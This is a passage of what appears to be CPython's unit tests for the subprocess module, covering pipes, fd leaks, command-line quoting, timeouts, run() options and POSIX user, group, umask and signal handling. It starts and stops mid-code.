self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, os_helper.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen(ZERO_RETURN_CMD)
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
self.assertEqual(p.wait(timeout=support.SHORT_TIMEOUT), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen(ZERO_RETURN_CMD, None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen(ZERO_RETURN_CMD, bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
        # we should get an empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
with self.assertWarnsRegex(RuntimeWarning, 'line buffering'):
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
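    # Illustrative sketch, not collected by the test runner: with text mode
    # and bufsize=1 the parent's p.stdin is line buffered, so writing a full
    # line is enough to get it delivered to the child without an explicit
    # flush(), which is exactly what the helper above relies on. The child
    # command and helper name here are ours, purely for illustration.
    def _example_line_buffered_round_trip(self, line="ping\n"):
        with subprocess.Popen([sys.executable, "-c",
                               "import sys; print(sys.stdin.readline().strip())"],
                              stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                              text=True, bufsize=1) as p:
            p.stdin.write(line)          # flushed by line buffering
            return p.stdout.readline()   # the echoed line, once the child exits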
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def test_nonexisting_with_pipes(self):
        # bpo-30121: Popen with pipes must properly close pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=support.SHORT_TIMEOUT)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_repr(self):
path_cmd = pathlib.Path("my-tool.py")
pathlib_cls = path_cmd.__class__.__name__
cases = [
("ls", True, 123, "<Popen: returncode: 123 args: 'ls'>"),
('a' * 100, True, 0,
"<Popen: returncode: 0 args: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...>"),
(["ls"], False, None, "<Popen: returncode: None args: ['ls']>"),
(["ls", '--my-opts', 'a' * 100], False, None,
"<Popen: returncode: None args: ['ls', '--my-opts', 'aaaaaaaaaaaaaaaaaaaaaaaa...>"),
(path_cmd, False, 7, f"<Popen: returncode: 7 args: {pathlib_cls}('my-tool.py')>")
]
with unittest.mock.patch.object(subprocess.Popen, '_execute_child'):
for cmd, shell, code, sx in cases:
p = subprocess.Popen(cmd, shell=shell)
p.returncode = code
self.assertEqual(repr(p), sx)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
    # For simplicity this test only targets Linux-like systems, to at least
    # have some coverage. It is not a platform-specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
ZERO_RETURN_CMD, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
def test_class_getitems(self):
self.assertIsInstance(subprocess.Popen[bytes], types.GenericAlias)
self.assertIsInstance(subprocess.CompletedProcess[str], types.GenericAlias)
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = subprocess.run(ZERO_RETURN_CMD, check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_run_with_pathlike_path(self):
# bpo-31961: test run(pathlike_object)
        # the name of a command that can be run without any arguments
        # and that exits quickly
prog = 'tree.com' if mswindows else 'ls'
path = shutil.which(prog)
if path is None:
self.skipTest(f'{prog} required for this test')
path = FakePath(path)
res = subprocess.run(path, stdout=subprocess.DEVNULL)
self.assertEqual(res.returncode, 0)
with self.assertRaises(TypeError):
subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
def test_run_with_bytes_path_and_arguments(self):
# bpo-31961: test run([bytes_object, b'additional arguments'])
path = os.fsencode(sys.executable)
args = [path, '-c', b'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_run_with_pathlike_path_and_arguments(self):
# bpo-31961: test run([pathlike_object, 'additional arguments'])
path = FakePath(sys.executable)
args = [path, '-c', 'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_capture_output(self):
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
    # This test _might_ wind up a bit fragile on loaded build+test machines,
    # as it depends on timing. The margins are wide enough for normal
    # situations, and it asserts that everything happened "soon enough" to
    # believe the right thing happened.
@unittest.skipIf(mswindows, "requires posix like 'sleep' shell command")
def test_run_with_shell_timeout_and_capture_output(self):
"""Output capturing after a timeout mustn't hang forever on open filehandles."""
before_secs = time.monotonic()
try:
subprocess.run('sleep 3', shell=True, timeout=0.1,
capture_output=True) # New session unspecified.
except subprocess.TimeoutExpired as exc:
after_secs = time.monotonic()
stacks = traceback.format_exc() # assertRaises doesn't give this.
else:
self.fail("TimeoutExpired not raised.")
self.assertLess(after_secs - before_secs, 1.5,
msg="TimeoutExpired was delayed! Bad traceback:\n```\n"
f"{stacks}```")
def _get_test_grp_name():
for name_group in ('staff', 'nogroup', 'grp', 'nobody', 'nfsnobody'):
if grp:
try:
grp.getgrnam(name_group)
except KeyError:
continue
return name_group
else:
raise unittest.SkipTest('No identified group name to use for this test on this platform.')
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
self.assertEqual(desired_exception.filename, e.filename)
else:
self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests we can forego
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called but there is no easy way
# to do that
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where its not
in the expected format"""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
# Anything can be in the pipe, no assumptions should
# be made about its encoding, so we'll write some
# arbitrary hex bytes to test it out
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
@unittest.skipIf(not os.path.exists('/proc/self/status'),
"need /proc/self/status")
def test_restore_signals(self):
# Blindly assume that cat exists on systems with /proc/self/status...
default_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=False)
for line in default_proc_status.splitlines():
if line.startswith(b'SigIgn'):
default_sig_ign_mask = line
break
else:
self.skipTest("SigIgn not found in /proc/self/status.")
restored_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=True)
for line in restored_proc_status.splitlines():
if line.startswith(b'SigIgn'):
restored_sig_ign_mask = line
break
self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
msg="restore_signals=True should've unblocked "
"SIGPIPE and friends.")
def test_start_new_session(self):
        # For code coverage of calling setsid(). We don't care if we get an
        # EPERM error from it depending on the test execution environment;
        # that still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c", "import os; print(os.getsid(0))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_sid = os.getsid(0)
child_sid = int(output)
self.assertNotEqual(parent_sid, child_sid)
@unittest.skipUnless(hasattr(os, 'setreuid'), 'no setreuid on platform')
def test_user(self):
        # For code coverage of the user parameter. We don't care if we get an
        # EPERM error from it depending on the test execution environment;
        # that still indicates that it was called.
uid = os.geteuid()
test_users = [65534 if uid != 65534 else 65533, uid]
name_uid = "nobody" if sys.platform != 'darwin' else "unknown"
if pwd is not None:
try:
pwd.getpwnam(name_uid)
test_users.append(name_uid)
except KeyError:
# unknown user name
name_uid = None
for user in test_users:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(user=user, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getuid())"],
user=user,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
except OSError as e:
if e.errno not in (errno.EACCES, errno.EPERM):
raise
else:
if isinstance(user, str):
user_uid = pwd.getpwnam(user).pw_uid
else:
user_uid = user
child_user = int(output)
self.assertEqual(child_user, user_uid)
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=-1)
with self.assertRaises(OverflowError):
subprocess.check_call(ZERO_RETURN_CMD,
cwd=os.curdir, env=os.environ, user=2**64)
if pwd is None and name_uid is not None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=name_uid)
@unittest.skipIf(hasattr(os, 'setreuid'), 'setreuid() available on platform')
def test_user_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, user=65535)
@unittest.skipUnless(hasattr(os, 'setregid'), 'no setregid() on platform')
def test_group(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
if grp is not None:
group_list.append(name_group)
for group in group_list + [gid]:
# posix_spawn() may be used with close_fds=False
for close_fds in (False, True):
with self.subTest(group=group, close_fds=close_fds):
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getgid())"],
group=group,
close_fds=close_fds)
except PermissionError: # (EACCES, EPERM)
pass
else:
if isinstance(group, str):
group_gid = grp.getgrnam(group).gr_gid
else:
group_gid = group
child_group = int(output)
self.assertEqual(child_group, group_gid)
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=-1)
with self.assertRaises(OverflowError):
subprocess.check_call(ZERO_RETURN_CMD,
cwd=os.curdir, env=os.environ, group=2**64)
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=name_group)
@unittest.skipIf(hasattr(os, 'setregid'), 'setregid() available on platform')
def test_group_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, group=65535)
@unittest.skipUnless(hasattr(os, 'setgroups'), 'no setgroups() on platform')
def test_extra_groups(self):
gid = os.getegid()
group_list = [65534 if gid != 65534 else 65533]
name_group = _get_test_grp_name()
perm_error = False
if grp is not None:
group_list.append(name_group)
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os, sys, json; json.dump(os.getgroups(), sys.stdout)"],
extra_groups=group_list)
except OSError as ex:
if ex.errno != errno.EPERM:
raise
perm_error = True
else:
parent_groups = os.getgroups()
child_groups = json.loads(output)
if grp is not None:
desired_gids = [grp.getgrnam(g).gr_gid if isinstance(g, str) else g
for g in group_list]
else:
desired_gids = group_list
if perm_error:
self.assertEqual(set(child_groups), set(parent_groups))
else:
self.assertEqual(set(desired_gids), set(child_groups))
# make sure we bomb on negative values
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[-1])
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD,
cwd=os.curdir, env=os.environ,
extra_groups=[2**64])
if grp is None:
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD,
extra_groups=[name_group])
@unittest.skipIf(hasattr(os, 'setgroups'), 'setgroups() available on platform')
def test_extra_groups_error(self):
with self.assertRaises(ValueError):
subprocess.check_call(ZERO_RETURN_CMD, extra_groups=[])
@unittest.skipIf(mswindows or not hasattr(os, 'umask'),
'POSIX umask() is not available.')
def test_umask(self):
tmpdir = None
try:
tmpdir = tempfile.mkdtemp()
name = os.path.join(tmpdir, "beans")
            # We set an unusual umask in the child so as to get a unique
            # mode that we can test the child's created file for.
subprocess.check_call(
[sys.executable, "-c", f"open({name!r}, 'w').close()"],
umask=0o053)
# Ignore execute permissions entirely in our test,
# filesystems could be mounted to ignore or force that.
st_mode = os.stat(name).st_mode & 0o666
expected_mode = 0o624
self.assertEqual(expected_mode, st_mode,
msg=f'{oct(expected_mode)} != {oct(st_mode)}')
finally:
if tmpdir is not None:
shutil.rmtree(tmpdir)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
        # We're relying on the repr() of the signal.Signals IntEnum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
